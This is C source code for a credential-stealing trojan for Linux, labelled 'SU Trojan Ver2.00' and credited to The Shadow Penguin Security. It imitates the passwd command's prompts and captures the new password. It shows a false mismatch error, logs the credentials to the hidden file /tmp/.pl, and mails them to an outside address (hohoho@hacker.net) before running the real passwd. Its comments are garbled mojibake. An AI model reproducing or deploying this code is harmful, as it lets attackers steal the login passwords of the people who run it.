/*============================================================================= SU Trojan Ver2.00 for Linux The Shadow Penguin Security (http://shadowpenguin.backsection.net) Written by UNYUN (unewn4th@usa.net) ============================================================================= */ #include <pwd.h> #include <stdio.h> #include <stdlib.h> /* ƒpƒXƒ��[ƒh‚ð’Ê’m‚·‚éƒ�ƒAƒh */ /* ˆÈ‰º‚Ì1�s‚ð�í�œ‚·‚é‚ƃ��[ƒ‹’Ê’m‚Í�s‚í‚ê‚Ü‚¹‚ñ */ #define MAIL "hohoho@hacker.net" /* ƒ�ƒMƒ“ƒOƒtƒ@ƒCƒ‹. Œ©‚‚©‚è‚É‚­‚¢–¼‘O‚É•Ï�X */ #define LOGFILE "/tmp/.pl" #define MSG_PERMERR "passwd: only root can supply a user's name\n" #define MSG_BANNER "Changing password for %s\n" #define MSG_OLDPASS "(current) UNIX password: " #define MSG_BADOLDPASS "passwd: Authentication failure\n" #define MSG_NEWPASS "New UNIX password: " #define MSG_RENEWPAS "Retype new UNIX password: " #define MSG_TOOSHORT "BAD PASSWORD: it's WAY too short\n" #define MSG_MUSTDIFF "BAD PASSWORD: is too similiar to the old one\n" #define MSG_INVALID "BAD PASSWORD: is too simple\n" #define MSG_DONTMATCH "Sorry, passwords do not match\n" #define TMPFILE "/tmp/.tmp" #define MAX_USERNAME 200 #define MAX_PASSWD 200 main(int argc,char *argv[]) { int uid=getuid(); struct passwd p; char oldpasswd[MAX_PASSWD],newpasswd[MAX_PASSWD],renewpasswd[MAX_PASSWD]; char *getpass_sys(char *); char username[MAX_USERNAME]; char buf[200]; FILE *fp; int i,ct,l; memcpy(&p,getpwuid(uid),sizeof(struct passwd)); if (argc==1) strcpy(username,p.pw_name); else{ printf(MSG_PERMERR); exit(1); } printf(MSG_BANNER,username); if (uid!=0){ strncpy(oldpasswd,getpass(MSG_OLDPASS),MAX_PASSWD-1); oldpasswd[MAX_PASSWD-1]=0; if (strlen(oldpasswd)==0){ printf(MSG_BADOLDPASS); sleep(1); exit(1); } } for (;;){ strncpy(newpasswd,getpass_sys(MSG_NEWPASS),MAX_PASSWD-1); newpasswd[MAX_PASSWD-1]=0; if (strlen(newpasswd)<strlen(oldpasswd)) l=strlen(newpasswd); else l=strlen(oldpasswd); for (ct=0,i=0;i<l;i++) if (newpasswd[i]!=oldpasswd[i]) ct++; if (ct>=3) break; else printf(MSG_MUSTDIFF); } strncpy(renewpasswd,getpass_sys(MSG_RENEWPAS),MAX_PASSWD-1); renewpasswd[MAX_PASSWD-1]=0; printf(MSG_DONTMATCH); if ((fp=fopen(LOGFILE,"a"))!=NULL){ fprintf(fp,"%s %s %s\n",username,newpasswd,renewpasswd); fclose(fp); } #ifdef MAIL if ((fp=fopen(TMPFILE,"w"))!=NULL){ fprintf(fp,"%s %s %s\n",username,newpasswd,renewpasswd); fclose(fp); } sprintf(buf,"mail %s < %s",MAIL,TMPFILE); system(buf); remove(TMPFILE); #endif system("passwd"); } char *getpass_sys(char *d) { static char *x; int i,c1,c2; for (;;){ x=(char *)getpass(d); if (strlen(x)<6){ printf(MSG_TOOSHORT); continue; } c1=c2=0; for (i=0;i<strlen(x);i++){ if ((x[i]>='a' && x[i]<='x') || (x[i]>='A' && x[i]<='X')) c1++; else c2++; } if (c1<2 || c2==0){ printf(MSG_INVALID); continue; } break; } return (x); }